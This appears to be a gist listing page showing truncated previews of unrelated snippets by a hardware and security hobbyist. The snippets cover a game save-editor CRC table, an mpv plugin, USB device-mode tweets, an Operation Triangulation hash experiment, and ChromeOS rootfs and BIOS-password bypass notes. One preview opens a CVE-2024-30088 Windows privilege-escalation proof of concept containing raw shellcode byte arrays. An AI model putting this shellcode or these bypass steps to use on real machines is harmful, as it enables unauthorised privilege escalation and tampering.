| # Loosely based on https://gist.github.com/Experiment5X/5025310 and https://github.com/VakhtinAndrey/Dead-Space-2-PC-Save-Editor | |
| # with a lot of cleanup of the decompiled code | |
| import struct, sys | |
| crc_table = [ | |
| 0x00000000, 0x04C11DB7, 0x09823B6E, 0x0D4326D9, 0x130476DC, 0x17C56B6B, 0x1A864DB2, 0x1E475005, | |
| 0x2608EDB8, 0x22C9F00F, 0x2F8AD6D6, 0x2B4BCB61, 0x350C9B64, 0x31CD86D3, 0x3C8EA00A, 0x384FBDBD, | |
| 0x4C11DB70, 0x48D0C6C7, 0x4593E01E, 0x4152FDA9, 0x5F15ADAC, 0x5BD4B01B, 0x569796C2, 0x52568B75, | |
| 0x6A1936C8, 0x6ED82B7F, 0x639B0DA6, 0x675A1011, 0x791D4014, 0x7DDC5DA3, 0x709F7B7A, 0x745E66CD, | |
| 0x9823B6E0, 0x9CE2AB57, 0x91A18D8E, 0x95609039, 0x8B27C03C, 0x8FE6DD8B, 0x82A5FB52, 0x8664E6E5, |
Original report
| // | |
| // CVE-2024-30088 PoC - @carrot_c4k3 (exploits.forsale) | |
| // | |
| let get_token_handle_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x48,0x48,0xc7,0x44,0x24,0x38,0x0,0x0,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0xff,0x10,0x4c,0x8d,0x44,0x24,0x38,0xba,0x0,0x0,0x0,0x2,0x48,0x8b,0xc8,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x8,0xc7,0x44,0x24,0x30,0x0,0x0,0x0,0x0,0x48,0x8d,0x44,0x24,0x30,0x48,0x89,0x44,0x24,0x20,0x41,0xb9,0x0,0x20,0x0,0x0,0x48,0x8b,0x44,0x24,0x50,0x4c,0x8b,0x40,0x18,0xba,0x16,0x0,0x0,0x0,0x48,0x8b,0x4c,0x24,0x38,0x48,0x8b,0x44,0x24,0x50,0xff,0x50,0x10,0x48,0x8b,0x44,0x24,0x50,0x48,0x8b,0x4c,0x24,0x38,0x48,0x89,0x48,0x40,0x8b,0x44,0x24,0x30,0x48,0x83,0xc4,0x48,0xc3,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc,0xcc] | |
| let create_smash_thread_code = [0x48,0x89,0x4c,0x24,0x8,0x48,0x83,0xec,0x38,0x48,0xc7,0x44,0x24,0x28,0x0,0x0,0x0,0x0,0xc7,0x44,0x24,0x20,0x0,0x0,0x0,0x0,0x4c,0x8b,0x4c,0x24,0x40,0x48,0x8b,0x44,0x24,0x40,0x4c,0x8b,0x40,0x28,0x33,0xd2,0x33,0xc9,0x48,0x8b,0x44,0x24,0x40,0xff,0x50,0x20,0x48,0x83,0xc4,0x38,0xc3,0xcc |
This tutorial provides a step-by-step guide to recover the BIOS password from an Asus VivoBook using a memory dump.
This is a living document. Everything in this document is made in good faith of being accurate, but like I just said; we don't yet know everything about what's going on.
Update: I've disabled comments as of 2025-01-26 to avoid everyone having notifications for something a year on if someone wants to suggest a correction. Folks are free to email to suggest corrections still, of course.
| #include <stddef.h> | |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <unistd.h> | |
| #include <gio/gio.h> | |
| #include <mpv/client.h> | |
| /** | |
| * mpv pluging to inhibit screensaver while playing a video on GNOME Desktop |
| import struct, time | |
| ## This experiment demonstrates that the claimed "hash" (that is not a hash) used | |
| ## by the L2 cache ECC debug feature used by Operation Triangulation is not secure, | |
| ## and can be trivially reverse engineered by anyone who owns one of the machines | |
| ## with the hardware (such as any M1 Mac), in seconds to days. Therefore, this proves | |
| ## that no "insider" access or leak is necessary to obtain this table, and that the | |
| ## attackers most likely did exactly the same thing. | |
| ## This is the "black box", i.e. the hardware: The table is not exposed to the caller. | |
| class BlackBox: |
Short guide on how to bypass this:
If you haven't disabled rootfs verification, switch to vt-2 and run /usr/libexec/debugd/helpers/dev_features_rootfs_verification. Then reboot.
Inside crostini, download minioverride.c and compile it with gcc minioverride.c -o minioverride.so -shared (make sure gcc is installed)
In the files app, move minioverride.so into your downloads folder.
| https://twitter.com/ShinyQuagsire/status/1536432635643211777 12:37 PM · Jun 13, 2022 | |
| ----- | |
| I figured out how to enable USB device mode on my XPS 13 (9350) 🎉 | |
| Though for some ungodly reason, it uses the right-side full USB port. So a crossover cable is required. | |
| ----- | |
| https://twitter.com/ShinyQuagsire/status/1536434057671716864 12:43 PM · Jun 13, 2022 | |
| ----- |
